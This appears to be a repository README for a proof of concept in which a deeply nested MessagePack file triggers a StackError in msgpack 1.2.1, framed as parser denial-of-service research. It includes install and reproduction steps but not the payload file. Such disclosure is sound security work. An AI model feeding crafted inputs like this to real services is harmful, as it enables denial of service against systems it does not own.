MessagePack nested-array StackError PoC
This repository hosts a benign security research PoC for a MessagePack parser denial of service.
Files
messagepack-nested-5000.msgpack
Reproduction
Use latest msgpack 1.2.1:
python3 -m venv .venv-msgpack-121
. .venv-msgpack-121/bin/activate
pip install msgpack==1.2.1
python - <<'PY'
import msgpack
data = open("messagepack-nested-5000.msgpack", "rb").read()
msgpack.unpackb(data, raw=False)
PY
Observed result:
StackError
Safety note
This artifact is a non-executable malformed model-file PoC for parser-stress testing only.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support